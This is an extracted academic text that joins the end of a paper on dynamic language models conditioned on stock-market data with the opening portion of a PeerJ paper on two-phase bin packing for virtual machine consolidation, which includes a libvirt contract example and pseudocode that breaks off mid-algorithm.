Besides feature coefficients, our model captures temporal shift by modeling similar- ity across the most recent c days. During inference, our model weights different word distributions from the past. The similarity is encoded in the pairwise features f(xt,xk) and the parameters α. Figure 5 shows the distributions of the strongest-posterior models from previous timesteps, based on how far 189 EN:NA timestep pe rp le xi ty 0 50 100 150 200 250 300 350 20 0 40 0 60 0 base allbase all completecomplete int. one allint. one all EN:JP timestep pe rp le xi ty 0 50 100 150 200 250 300 350 20 0 40 0 60 0 base allbase allcompletecomplete int. one allint. one all FR timestep pe rp le xi ty 0 50 100 150 200 250 300 350 20 0 40 0 60 0 base allbase all completecomplete int. one allint. one all DE timestep pe rp le xi ty 0 50 100 150 200 250 300 350 30 0 50 0 70 0 base allbase all completecomplete int. one allint. one all Figure 4: Perplexity over time for four Reuters news streams (c = 7) with bigram base models. 190 in the past they are at the time of use, aggregated across rounds on the EN:NA dataset, for window size c = 14. It shows that the model tends to favor models from days closer to the current date, with the t− 1 models selected the most, perhaps because the state of the world today is more similar to dates closer to today compare to more distant dates. The plot also explains why increasing c from 7 to 14 did not im- prove performance of the model, since most of the variation in our datasets can be captured with models from the past week. Topics. Latent topic variables have often figured heavily in approaches to dynamic language model- ing. In preliminary experiments incorporating single- membership topic variables (i.e., each document be- longs to a single topic, as in a mixture of unigrams), we saw no benefit to perplexity. Incorporating top- ics also increases computational cost, since we must maintain and estimate one language model per topic, per timestep. It is straightforward to design mod- els that incorporate topics with single- or mixed- membership as in LDA (Blei et al., 2003), an in- teresting future direction. Potential applications. Dynamic language models like ours can be potentially useful in many applica- tions, either as a standalone language model, e.g., predictive text input, whose performance may de- pend on the temporal dimension; or as a component in applications like machine translation or speech recognition. Additionally, the model can be seen as a step towards enhancing text understanding with numerical, contextual data. 7 Conclusion We presented a dynamic language model for stream- ing datasets that allows conditioning on observable real-world context variables, exemplified in our ex- periments by stock market data. We showed how to perform learning and inference in an online fashion for this model. Our experiments showed the predic- tive benefit of such conditioning and online learning by comparing to similar models that ignore temporal dimensions and observable variables that influence the text. Acknowledgements The authors thank several anonymous reviewers for help- ful feedback on earlier drafts of this paper and Brendan O’Connor for help with collecting Twitter data. This re- search was supported in part by Google, by computing resources at the Pittsburgh Supercomputing Center, by National Science Foundation grant IIS-1111142, AFOSR grant FA95501010247, ONR grant N000140910758, and by the Intelligence Advanced Research Projects Activ- ity via Department of Interior National Business Center contract number D12PC00347. The U.S. Government is authorized to reproduce and distribute reprints for Govern- mental purposes notwithstanding any copyright annotation thereon. The views and conclusions contained herein are those of the authors and should not be interpreted as nec- essarily representing the official policies or endorsements, either expressed or implied, of IARPA, DoI/NBC, or the U.S. Government. References Galen Andrew and Jianfeng Gao. 2007. Scalable training of l1-regularized log-linear models. In Proc. of ICML. David M. Blei and John D. Lafferty. 2006. Dynamic topic models. In Proc. of ICML. David M. Blei, Andrew Y. Ng, and Michael I. Jordan. 2003. Latent Dirichlet allocation. Journal of Machine Learning Research, 3:993–1022. Sébastien Bubeck. 2011. Introduction to online opti- mization. Technical report, Department of Operations Research and Financial Engineering, Princeton Univer- sity. Nicolò Cesa-Bianchi and Gábor Lugosi. 2006. Prediction, Learning, and Games. Cambridge University Press. William S. Cleveland. 1979. Robust locally weighted regression and smoothing scatterplots. Journal of the American Statistical Association, 74(368):829–836. Thomas M. Cover and Joy A. Thomas. 1991. Elements of Information Theory. John Wiley & Sons. John Duchi and Yoram Singer. 2009. Efficient online and batch learning using forward backward splitting. Journal of Machine Learning Research, 10(7):2899– 2934. Jacob Eisenstein, Brendan O’Connor, Noah A. Smith, and Eric P. Xing. 2010. A latent variable model for geographic lexical variation. In Proc. of EMNLP. Jacob Eisenstein, Amr Ahmed, and Eric P. Xing. 2011. Sparse additive generative models of text. In Proc. of ICML. Amit Goyal, Hal Daume III, and Suresh Venkatasubrama- nian. 2009. Streaming for large scale NLP: Language modeling. In Proc. of HLT-NAACL. 191 Matt Hoffman, David M. Blei, Chong Wang, and John Paisley. 2013. Stochastic variational inference. Jour- nal of Machine Learning Research, 14:1303–1347. Antti Honkela and Harri Valpola. 2003. On-line varia- tional Bayesian learning. In Proc. of ICA. Tomoharu Iwata, Takeshi Yamada, Yasushi Sakurai, and Naonori Ueda. 2010. Online multiscale dynamic topic models. In Proc. of KDD. Frederick Jelinek. 1997. Statistical Methods for Speech Recognition. MIT Press. Jyrki Kivinen and Manfred K. Warmuth. 1997. Expo- nentiated gradient versus gradient descent for linear predictors. Information and Computation, 132:1–63. Victor Lavrenko, Matt Schmill, Dawn Lawrie, Paul Ogilvie, David Jensen, and James Allan. 2000. Mining of concurrent text and time series. In Proc. of KDD Workshop on Text Mining. Abby Levenberg and Miles Osborne. 2009. Stream-based randomised language models for SMT. In Proc. of EMNLP. Abby Levenberg, Chris Callison-Burch, and Miles Os- borne. 2010. Stream-based translation models for sta- tistical machine translation. In Proc. of HLT-NAACL. Dong C. Liu and Jorge Nocedal. 1989. On the limited memory BFGS method for large scale optimization. Mathematical Programming B, 45(3):503–528. David Mimno and Andrew McCallum. 2008. Topic mod- els conditioned on arbitrary features with Dirichlet- multinomial regression. In Proc. of UAI. Alexander Rakhlin. 2009. Lecture notes on online learn- ing. Technical report, Department of Statistics, The Wharton School, University of Pennsylvania. Masaaki Sato. 2001. Online model selection based on the variational bayes. Neural Computation, 13(7):1649– 1681. Shai Shalev-Shwartz. 2012. Online learning and online convex optimization. Foundations and Trends in Ma- chine Learning, 4(2):107–194. Martin J. Wainwright and Michael I. Jordan. 2008. Graph- ical models, exponential families, and variational infer- ence. Foundations and Trends in Machine Learning, 1(1–2):1–305. Chong Wang, David M. Blei, and David Heckerman. 2008. Continuous time dynamic topic models. In Proc. of UAI. Chong Wang, John Paisley, and David M. Blei. 2011. On- line variational inference for the hierarchical Dirichlet process. In Proc. of AISTATS. Martin Zinkevich. 2003. Online convex programming and generalized infinitesimal gradient ascent. In Proc. of ICML. 192 work_yjeaxa5xifgpzgw7buftmhsgta ---- Submitted 9 July 2015 Accepted 3 February 2016 Published 24 February 2016 Corresponding author Eli M. Dow, emdow@us.ibm.com Academic editor Wolfgang Banzhaf Additional Information and Declarations can be found on page 22 DOI 10.7717/peerj-cs.47 Copyright 2016 Dow Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Decomposed multi-objective bin-packing for virtual machine consolidation Eli M. Dow Industries and Solutions, IBM Research, Yorktown Heights, NY, United States Department of Interdisciplinary Engineering Science, Clarkson University, Potsdam, NY, United States ABSTRACT In this paper, we describe a novel solution to the problem of virtual machine (VM) consolidation, otherwise known as VM-Packing, as applicable to Infrastructure-as- a-Service cloud data centers. Our solution relies on the observation that virtual ma- chines are not infinitely variable in resource consumption. Generally, cloud compute providers offer them in fixed resource allocations. Effectively this makes all VMs of that allocation type (or instance type) generally interchangeable for the purposes of consolidation from a cloud compute provider viewpoint. The main contribution of this work is to demonstrate the advantages to our approach of deconstructing the VM consolidation problem into a two-step process of multidimensional bin packing. The first step is to determine the optimal, but abstract, solution composed of finite groups of equivalent VMs that should reside on each host. The second step selects concrete VMs from the managed compute pool to satisfy the optimal abstract solution while enforcing anti-colocation and preferential colocation of the virtual machines through VM contracts. We demonstrate our high-performance, deterministic packing solution generation, with over 7,500 VMs packed in under 2 min. We demonstrating compara- ble runtimes to other VM management solutions published in the literature allowing for favorable extrapolations of the prior work in the field in order to deal with larger VM management problem sizes our solution scales to. Subjects Autonomous Systems, Operating Systems Keywords Virtual machine management, Consolidation, IaaS INTRODUCTION AND MOTIVATION The primary contributions of this work are the construction of an efficient algorithm for packing virtual machines densely in an Infrastructure-as-a-Service (IaaS) data center. Reducing the number of physical hosts is one way to reduce costs of cloud computing data centers by limiting the power and cooling needs of servers that need not run at full capacity when workloads can be run on a subset of the total available hardware. As has been demonstrated in the literature, powering down hosts completely is generally not ideal given the dynamic nature of cloud computing workloads. Consider that some number of individual cloud servers may participate in distributed services that necessarily preclude turning the machines off entirely due to response requirements when serving file contents. Though shutting hosts off completely is not an option in all cases, idle machines can be placed into a low power state to achieve much of the benefits described earlier (Isci et al., 2011; Zhang et al., 2014). Similar concepts have been applied to the persistent How to cite this article Dow (2016), Decomposed multi-objective bin-packing for virtual machine consolidation. PeerJ Comput. Sci. 2:e47; DOI 10.7717/peerj-cs.47 https://peerj.com mailto:emdow@us.ibm.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.47 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.47 disk volumes supporting storage networks for clouds (Narayanan, Donnelly & Rowstron, 2008). This effort is also supplementary to an ongoing cloud management framework being developed by our research group specifically to suit small-to-medium business- sized IaaS compute clouds. Average data center server utilization is reportedly estimated to be around 10% (±5%) (United States Environmental Protection Agency, 2007). Research shows that such low utilization is inefficient because even idle servers may consume more than 50% of their peak power requirements (Gandhi et al., 2009). The result of these findings is the implication that data centers should strive to have fewer servers running at close to peak utilization if they want to be efficient and more competitive on cost pricing. An obvious solution to drive down cloud compute cost is therefore to consolidate cloud compute resources (Virtual machines) onto the minimum number of host servers. Many of the previous efforts to describe solutions to Infrastructure-as-a-Service (IaaS) virtual machine packing stem from previous analyses and solutions to general purpose bin-packing type problems. Conceptually it works by assuming each VM is allocated some fixed share of the physical host’s compute resources. Examples of those fixed resources include the number of logical cores on a multi-core host, or the fractional allocation of the host’s total available memory and persistent storage. Many of these approaches are variations on the theme of multi-dimensional bin-packing approach (Campegiani & Lo Presti, 2009; Panigrahy et al., 2011). Others are based on genetic algorithms such as Gu et al. (2012), Campegiani (2009), and still others on market based systems (Lynar, Herbert & Simon, 2009). Our goal is to design a consolidation placement algorithm that is high performance and suitable for small-to-medium business-sized virtual machine data centers on the order of a few hundred virtual machines spanning fewer than 100 hosts. We focus on this demographic for two reasons. The first is because of the tractability of the problem. The second is because the medium sized business users are less likely to opt for exorbitant hardware capital expense to maintain performance while attempting some level of consolidation. Measurements on Google, Amazon, and Microsoft cloud service platforms demonstrate revenue losses ranging from 1 to 20% (Greenberg et al., 2009; Kohavi, Henne & Sommerfield, 2007; Schurman & Brutlag, 2009) due to consolidation induced latency. As such, the super large data centers often under consolidate intentionally to maintain response times. In Google data centers, for instance, it has been reported that consolidated workloads make use of only half of the available compute cores on the hardware (Mars et al., 2011). Every other processor core is left unused simply to ensure that performance does not degrade. Small-to-medium business (SMB) operations on the other hand, may be less cost sensitive to minute latency introductions, especially if they are supporting internal private cloud data centers on premises. PRIOR SOLUTIONS FOR GENERAL BIN PACKING When considering the existing solutions to virtual machine consolidation placement, it is reasonable to conclude that the problem is most similar to bin-packing solutions. Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 2/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 Stated in terms of the classical Bin Packing problem, virtual machine consolidation is stated as such: given a set I ={1,...,n}of items, where item i∈ I has size si ∈ (0,1] and a set B={1,...,n}of bins with capacity one. Find an assignment a: I →B such that the number of empty bins is maximized. The problem is known to be NP-complete. Further it has been shown that there is no ρ-approximation algorithm with ρ < 3/2 for Bin Packing unless P =NP. In other words, consider a finite collection of n weights called w(w1,w2,w3,...,wn), and a collection of identical bins with capacity C (that necessarily must be larger than the maximum individual weight from the set w), what is the minimum number (k) of bins required to contain all the weights without exceeding the bin capacity C? Setting aside the mathematical formulation, we are interested in the fewest bins required to store a collection of items. This variant of the bin-packing problem is known as the 1- dimensional (1-D) bin packing problem. Note that it is important to keep in mind that ‘‘weights’’ here are necessarily formulated as indivisible atomic values. The weight of an object being placed must fit entirely within the remaining capacity of a container and may not be subdivided. Approximation solutions to the bin packing problem usually make use of heuristic approaches, with the two most relevant solutions being Next-Fit, and First-Fit Decreasing. Next-Fit In the Next-Fit algorithm, all bins are initially considered to be empty. Beginning with bin j =1 and item i=1, if bin j has residual capacity for item i, assign item i to bin j via an assignment function a, i.e., a(i)= j. After an assignment is made, simply consider the next item (i+1) until exhausting all items. If there are items that still require packing, consider bin j+1 and item i. This process continues until the last item is assigned (packed). The major drawback of the Next-Fit algorithm is that the approach does not consider a bin after it has been processed once and left behind. This can lead to wasted capacity in those bins that are not revisited, and thus there is room for finding a better approximation solution. First-Fit Decreasing One solution to the drawbacks inherent in Next-Fit, is to employ the following algorithm. At the start, consider each of k bins as empty. Beginning with bins k =1 and item i=1, consider all bins j =1,...,k and place item i in the first bin that has sufficient residual capacity (i.e., a(i)= j). If there is no such bin available, increment k and repeat until the last item n is assigned. This form of First-Fit provably uses at most 17/10∗k bins, where k is the optimal number of required bins for a perfect solution (Johnson et al., 1974). However there are further refinements to the algorithm that should be considered. The simple intuition behind First-Fit Decreasing is that if you first reorder the items such that s1≥···≥ sn before applying the general First-Fit algorithm, you can obtain a superior result. Intuitively this is because the conceptually ‘‘larger’’ items, in our case multiple large resource consumption VMs are less likely to fit onto a single bin (host), Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 3/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 so we place each of the large resource consumers first, using the residual space to pack in smaller virtual machines. First fit decreasing runs in O(n2) time. Multi-dimensional Bin-Packing A key concept in 1-D Bin-Packing is that there is a single unified weight to be used as the driving input to packing constraints. But in the real world, bin packing is often subject to multivariate constraints. Consider trucks being packed with boxes for shipment. We could use a 1D bin-packing approach based on box weight and the shipping weight of a fleet of trucks, but this doesn’t work out well in the real world because boxes have a 3-dimensional volume to consider in addition to a weight. Simply consider many small but very heavy boxes, or a few light boxes that are voluminous and things become more complicated. HIERARCHICAL MULTI-OBJECTIVE BIN PACKING FOR VIRTUAL MACHINES Our solution to packing virtual machines is predicated on two major observations. The first is that most virtual machine cloud providers offer fixed size virtual machines at varying cost structures. At the time of this writing Amazon, one of the largest cloud computing hosts for IaaS virtual machines, offers VM sizes in small, medium, large, extra-large, double-extra-large, and quadruple-extra-large capacities, each with their own pricing according to a tiered cost structure. This means that in some sense virtual machines belonging to the same capacity and cost structure tier can be considered equivalent for the purposes of packing assignment. The intuition here is that virtual machine packing in a cloud data center is definitely a multi-dimensional bin-packing type of problem where the constraints are related to the host capacities and virtual machine consumption requirements of memory, CPU, disk I/O, and networking. Our formulation of the bin packing problem, as it applies to virtual machines, is as follows. Given a host with overall hardware capacity C, we can represent that capacity as a tuple of the individual resources that comprise C, for instance CPU, RAM, and IO as constituent individual capacities, ci we can say formalize the capacity of a host as: C ={c1,c2,c3,...,cn} s.t.∀ci∈C,ci≥0 where the physical capacities of a limited resource, i.e., c1, might representing the physical CPU capacity of the host, c2 representing RAM capacity of the host, and c3 representing I/O capacity of host with capacity tuple C. A virtual machine, V can similarly be defined as a tuple of resources required for the operation of that VM according to the same resource cardinality used to describe resource capacities of a host. As an example here: V ={v1,v2,v3,...,vn}. Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 4/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 The value v1 represents the CPU requirement of virtual machine V , while v2 similarly means the RAM requirements of the VM, and v3 means the I/O requirements of the virtual machine V . With this formalism we can further consider that a given host is considered over- constrained if any per-resource cumulative VM utilization exceeds a maximum percent- age τ of the physical resource a given threshold. If no oversubscription of resources is allowed with the virtualization platform, (0 <τ ≤1), if oversubscription of resources is permissible, (0 <τ ≤τMAX) where τMAX is the maximum oversubscription threshold allowed. There is thus a tuple for defining the per-host (C), per-measured resource utilization/ over-constraint percentage (τi) of the form: τc ={τ1,τ2,τ3,...,τn}. Accordingly, each measured resource may have a τMAX defined according to the same cardinality as C and V that denotes the maximum per-resource utilization/over- constraint percentage for a given measured resource. We thusly define functions to retrieve the over-constraint factor as follows: τ(C,i) which is alternatively written as τc[i] using array indexing notation, along with and τMAX(C,i) which is alternatively written as τMAXc[i], where C remains a specific host instance, and i remains the cardinality of some measured resource. If there are k virtual machines assigned or allocated to a given host C, the boolean packing allocation P(C) is defined as follows: P(C)=   1, iff k∑ i=1 vi≤ci∗τ(c,i)≤ci∗τMAX(c,i) 0, iff k∑ i=1 vi >ci∗τ(c,i). The general bin packing problem attempts to solve for the minimum number of hosts n, s.t.∀Vi ∈V , Vi is placed on some host Cj ∈C. Hosts which contain some number of packed VMs form the set C′ with C′⊆C. Any elements in C 6∈C′ are unassigned or unused and may be powered down or put into low power standby. Thus, the goal of bin packing is to determine the smallest n number of hosts with one or more VMs allocated, and the allocations are valid according to our packing validity function (P) above. Min(n) s.t. { n=|C′| ∀Cn∈C,V (C)=1. The problem with the general bin packing problem is that it is computationally pro- hibitive to compute all possible packing solutions to perform this minimization as the combinations of VM to host mappings explodes. In contrast to previous virtual machine bin packing solutions, our approach first generates a generic, yet optimal solution to a slightly different problem that relaxes the condition that each VM be considered Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 5/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 independently or seen as unique in its resource consumption requirements. Specifically it determines, for each host, the required allocation count from a finite (read arbitrarily small) enumeration of similar sized VMs (VM equivalence sets). This arbitrarily small grouping of similar sized VMs is based on partitioning, or clustering VMs into equiva- lence sets according to resource consumption size. By relaxing the uniqueness of VMs and allowing groups of them to be treated identically in terms of assumed, nominal, resource consumption, an optimal solution to this problem can be found very rapidly using a dynamic programming approach (described in detail in ‘Constructing an ideal solution template’). Once this generic recipe for VM allocation is determined, it is concretely fulfilled from the actual list of distinct virtual machines being managed by employing a variant of First-Fit Decreasing (as described in ‘Concrete VM allocation fulfillment). The first-fit decreasing approach selects concrete VM instances from the appropriate size peer-groups using a hierarchical multi-objective strategy, which is tunable, by the system operator depending on requirements. This latter multi-objective fulfillment is and integral part of our solution because we respect the notion that bad colocation selections can impair overall system performance. Consider for instance the prior research on process colocation scheduling that uses previously measured performance degradations of possible combinations as input to colocation placement decisions to yield the lowest possible co-located degradation (Jiang et al., 2008; Jiang, Tian & Shen, 2010; Tian, Jiang & Shen, 2009). This work was improved upon and made more relevant to the class of virtual machine consolidation problems by an approach that enabled an explicit, tunable performance bound in PACMan (Roytman et al., 2013) as a goal for consolidation. However, the work in PACMan required initial placement to be on lightly consolidated servers (conservative placement in their terminology), for a period of time while observations were made to determine colocation impact characteristics on the VM. The authors of the PACMan system used 30–60 min as example batch periods for this purpose. In contrast, our goal was to build something that can perform VM consolidation packing almost continuously (every few minutes), with low resource usage. Constructing an ideal solution template To construct a template for what the ideal packing solution should look like, our algo- rithm uses a dynamic programming style solution. The first step is to discretize the virtual machines to be packed into a set of equivalence combinations. Equivalence here means more or less the same computational requirements. For instance, if one is familiar with the Amazon EC2 Instance types, one could consider all instantiations of an EC2 Instance type to be equivalent for the purposes of virtual machine bin packing. In some situations, the size of equivalence sets combinations are known a priori because virtual machines are cloned from templates, or golden master images and then customized for each unique deployment. In general, one can consider our algorithm as ‘‘off-line’’ in bin-packing parlance because we know the sizes of all containers and all objects to be packed prior to running the algorithm. The equivalence set can be represented by an ordered tuple consisting of the largest, per-VM resource consumption parameters from each element in the set. For instance, Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 6/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 in our experimentation we used the following notation to describe an equivalence set: ‘‘M::16 C::8 N::2 S::1 E::2’’ which describes the set of instances containing 16 GB RAM, eight logical CPU cores, two network compute units, a single set holding of two concrete elements (VMs) in total. Later versions of this software were enhanced to more specifically separate out the network values into a cumulative total, as well as constituent read and write capacity. The same approach was also implemented for disk I/O, but has been omitted from the examples for brevity. In situations where the equivalence sizes are not known ahead of time, one can opt to perform a clustering approach to define equivalence groupings, and thereby limit the groupings to a suitably small number of equivalence combinations so as to make this approach viable. Once a cluster is defined using a technique such as K-means clustering one can define the equivalence set to be each VM in the grouping. Likewise, the hosts in the cloud data center can be partitioned into equivalence sets. Hosts belong to the same equivalence set when any two hosts in the set are considered logically equivalent to each other in terms of capacity. When large cloud providers procure machines, they are often purchased several at a time according to the same specification, thereby lending itself to this approach well. In situations where hosts are not identical machines, system administrators can broadly lump together machines with similar compute capabilities. The algorithm begins by looking at each of the virtual machine equivalence combina- tions and examining the representative capacity. The algorithm then iteratively generates starting sets representing all possible combinations consisting of only virtual machines from the same equivalence (from the set of similarly sized VMs) that are viable (would fit logically on the largest host to be filled). The limiting factor that governs the expansion of the starting sets is when the resource requirements grow too large to fit on the largest capacity host. Consider the following example of this is unclear: assume the largest capacity host has 1 GB of RAM, and the smallest element from an equivalence set of virtual machines, lets call that set the SMALL instances, each require 256 MB of RAM. In this case, the starting sets produced from the SMALL instances would be the following trivial generation: 1×SMALL, 2×SMALL, 3×SMALL, and 4×SMALL as each set would cumulatively require 256, 512, 768, and 1,024 MB of RAM, respectively. No larger grouping of SMALL instances would fit on the largest host. These starting sets represent some initial candidate equivalence combinations to consider. Naturally, we extend this to include an oversubscription parameter for each resource dimension (RAM, CPU, disk I/O, networking I/O, etc.) that allows the resource to be oversubscribed on a per-host basis. From the example above, considering no over- subscription for RAM, we would have generated all four of the possible instantiations enumerated. Each element in the starting set represents an abstract combination from the SMALL-VM set that could be satisfied by concrete virtual machines that are considered equivalent. We further limit the generation of abstract combinations to ensure that combinations respect each dimension of resource under consideration. For instance, in the running Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 7/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 example there might actually only be three abstract combinations generated due to the cumulative I/O or CPU requirements of the abstract grouping as compared to the host capacity. We also limit the abstract combinations to contain no more of an equivalence set than the concrete instances. In other words, we do not generate something like 4×SMALL if there are in fact only 3 instances of the small VM size to be packed. The algorithm proceeds through each VM equivalence set (e.g., MICRO, SMALL, MEDIUM, LG, XL, XXL, QXL) generating all possible combinations of abstract VMs that could reside on the largest host on the network. This process of creating starting sets, when used with a relatively small number of equivalence sets (the order of 10 or so), completes virtually instantaneously on modern machines. The number of starting sets is on the order of the number of virtual machine categories (equivalence sets provided as input). With the completion of the generation of all abstract starting sets, we rigorously generate the exhaustive permutations of abstract, but viable, packing solutions. Expansion proceeds as follows. Assume that labels a, b, c, and d are labels for each of the generated equivalence sets. At step 1 the table of combinations could be listed as follows with a row dedicated to each known set where it must be strictly followed that a < b < c < d where the < operator is a standardized comparator, in our case RAM consumption: a b c d At the next iteration, each row is combined with all elements below it: a, ab, ac, ad b, bc, bd c, cd d Continuing in this fashion on a second iteration: a, ab, ac, ad, abc, abd, acd b, bc, bd, bcd c, cd d And the final iteration yields the complete permutation list: a, ab, ac, ad, abc, abd, acd, abcd b, bc, bd, bcd c, cd d As expected, we get 15 values from the original 4. This is because we are computing the combinations of P(4,4)+P(4,3)+P(4,2)+P(4,1) following the standard P(x,y) Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 8/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 meaning ‘‘permutations of x values by choosing y elements.’’ This is because, strictly speaking, virtual machine packing is a permutation problem not a combination problem since the meaning of a generic assignment solution that says: ‘‘2 large VMs and 1 small VM’’ is semantically identical to ‘‘1 small VM and 2 large VMs.’’ Order does not matter, and repeats are not possible. In reality we do not have single elements on each starting row however we have the starting sets expanded from the singleton abstract VMs. Each of the starting sets’ elements are combined with every element not from its own starting set modulo invalid permutations. Invalid permutations limit the state expansion due to the limitation that candidate permutations must remain dimensionally smaller than the largest host (note that smaller here means that the candidate solution permutation must be constrained by each compute resource dimension being observed). We compute the exhaustive solution of abstract permutations using a dynamic programming approach. By sorting the list of candidate solution recipes hierarchically as they are generated (for instance by cumulative memory requirement, then by cumulative CPU capacity required, etc.) we can eliminate much of the needless state expansion in computing all possible combinations through short circuit evaluation. The general worst-case runtime of computing bin-packing solutions, via an exhaustive computation of VM to host mapping possibilities is shown in Eq. (1): O ( n2 ) (1) where n is the number of VMs and k is the number of host servers. Instead, we compute something with complexity: O ( n∑ i=0 n! (n−i)! ) . (2) In Eq. (2), we can see runtime of permutation combination based on virtual machine placement equivalence. In Eq. (2), n is the size of the set of equivalence combinations (in other words the number of VM instance types in Amazon parlance), and i is simply the counter from 1 to n. Alternatively, we could consider that this approach runs in time: O ( nk ) . (3) Equation (3) is an example of a second formulation of the runtime of permutation computation based on virtual machine placement equivalence. In Eq. (3), the value of n here is once more the size of the set of equivalence permutations (i.e., the number of VM instance types from Amazon). Since we know that the n here is strictly speaking a much smaller value than the n from Eq. (1) the base improvement shows a potential for speedup assuming k is greater than or equal to 2. Considering that the exponent term in Eq. (3) is a constant value of 2 rather than the size of the number of hosts as compared to the exponent in Eq. (1), this comparison of exponential terms suggests a massive speedup in computation time for the abstract solution as compared to the exhaustive concrete Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 9/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 solution for all situations where the data center has more than two hosts. The resulting implication is that the ability to compute the general form of a VM packing solution, if not the exact solution in light of equivalence partitions among the virtual machines is a reasonable strategy to pursue. Note that during our experimentation we sorted the generated candidate solutions primarily on memory as it is shown in the literature to be the principal limiting factor in virtual machine consolidation (Tulloch, 2010; VMware, Inc, 2006). The approach of generating the candidate recipe of what the ideal VM to host mapping solution should look like in the abstract is substantially faster than computing all possible concrete combinations of virtual machine assignments. Note that, at this point, when abstract solution generation is complete we are left with only a partial solution to the VM consolidation problem that informs us of what the ideal consolidation should look like in the abstract (e.g., 2×SMALL, 3×MEDIUM, 1×XL). However, as we will see in the next section, the choice to defer the actual runtime solution of concrete VM assignment to a second processing phase is advantageous. Concrete VM allocation fulfillment After phase one is complete and all candidate equivalence combinations have been generated, we now proceed to the concrete assignment phase. In this phase we begin by iterating through the list of hardware hosts. The list of hardware hosts is sorted in largest to smallest capacity. We iterate through the sorted list of largest to smallest equivalence set permutations, assigning the first permutation that is satisfiable by the remaining, unassigned concrete VM instances. In essence this makes our algorithm a derivative of First-Fit Decreasing since we always fill the ‘‘largest’’ hosts first, with the ‘‘largest’’ equivalent set it can hold. Once an equivalence set is found that fits the host being filled, the satisfier tries to locate concrete VM instances according to that equivalence set specification. If the set is not satisfiable (i.e., the equivalence set selected indicated 3 large VMs and there are only 2 remaining) we simply remove the candidate set from the list, and advance to the next ‘‘largest’’ candidate equivalence set. Note that largest here means the biggest according to our multi-objective comparator function used to sort the lists prior to satisfaction time. In the assignment phase of consolidation, we have a roadmap for what the ideal consolidation should look like, but we still need to assign concrete virtual machine instances to each host that are representative of the plan. To do this, in theory, we could simply select any VM from the equivalence set specification (i.e., any SMALL VM is as good as any other). However, in practice we opt to use this opportunity to fulfill some hard and soft colocation/anti-colocation preferences expressed in VM contracts. Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 10/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 Listing 1: Example virtual machine definition with contract extensions. The colocation_constraints block demonstrates a single blacklisted host along with VMs for preferential colocation if possible. <contract id="ubuntuvm"> <ruleset type="vmm-libvirt"> <domain type="kvm"> <name>ubuntu</name> <uuid>03c03e0f-0a94-c167-5257-f52d772b1ec1</uuid> <memory>131072</memory> <currentMemory>131072</currentMemory> <vcpu>1</vcpu> <os> <type arch=’x86_64’ machine=’pc’>hvm</type> <boot dev=’hd’/> </os> <features> <acpi/> </features> <clock offset=’utc’/> <on_poweroff>destroy</on_poweroff> <on_reboot>restart</on_reboot> <on_crash>destroy</on_crash> <devices> <emulator>/usr/bin/kvm</emulator> <disk type=’file’ device=’disk’> <source file= ’/home/deshantm/ubuntu-kvm/disk0.qcow2’/> <target dev=’hda’ bus=’ide’/> </disk> <interface type=’network’> <mac address=’52:54:00:38:84:a7’/> <source network=’default’/> <model type=’virtio’/> </interface> <input type=’mouse’ bus=’ps2’/> <graphics type=’vnc’ port=’-1’ autoport=’yes’ listen=’127.0.0.1’/> </devices> </domain> </ruleset> <vmclassifier> <workload type=’cpu’/> </vmclassifier> <colocation_constraints> <blacklisted_colocation hosts= ’f81d4fae-7dec-11d0-a765-00a0c91e6b12’/> <preferential_colocation vms= ‘448b138e-1ac6-4d45-ae9d-b5e735ac465f, a21e27e4-a8a8-4576-b770-8f8d0b893e71’/> </colocation_constraints> Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 11/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 For instance, when selecting virtual machines we use a per-VM index of preferential colocation candidates and a per-VM set of anti-colocation constraints at satisfaction time. Anti-colocation are resolved first as they are considered a hard requirement, while colocation, or affinity preferences, are considered optional and satisfied when possible given the other firm constraints. Another aspect of our methodology is that we can then attempt more sophisticated placement systems such as load balancing across the consolidated hypervisors by using the actual runtime resource consumption of each virtual machine rather than just the nominal resource consumption maximums attributed to the equivalence group to which they belong. Listing 1 shows an example of a colocation constraint embedded in a virtual machine definition file for KVM as used in this research. An overall review of our two-phased decomposition of the virtual machine bin packing problem can be seen in Algorithm 1. Algorithm 1: Two-phase decomposition of the VM bin-packing wherein physical compute resource constraints are resolved in an abstract solution phase and colocation constraints are resolved during the second phase of concrete VM assignment. Consolidate (MAXHOST, {MD}, {V}, {H}) 1 Enumerate Equivalence Sets {E} from the set of all VMS {V} by method {E}=E({V}) 2 Expand singletons into singleton permutations: 3 foreach i=0 to |{E}|do 4 foreach abstract combination element e∈Ei do 5 {SE}= singletonExpansion(e) 6 append (Ei,{SE}) 7 Compute all permutations {P} over every element in {SE}: 8 for i=0 to |{SE}|do 9 P(|{SE}|,i) Considering all measured dimensions d,d ∈ {MD}, discarding each permutation p ∈ {P} where size (pd) > capacity of the largest host (MAXHOST) on dimension d (MAXHOST(d)). 10 Apply First-Fit Decreasing algorithm with the set of hosts {H} as bins, and {P} as the elements to pack to determine a candidate allocation of abstract, equivalent VMs to a host: 11 if an element p∈ {P} is satisfiable by a single solution s then apply s. 12 else if a set of elements {C} satisfy p ∈ 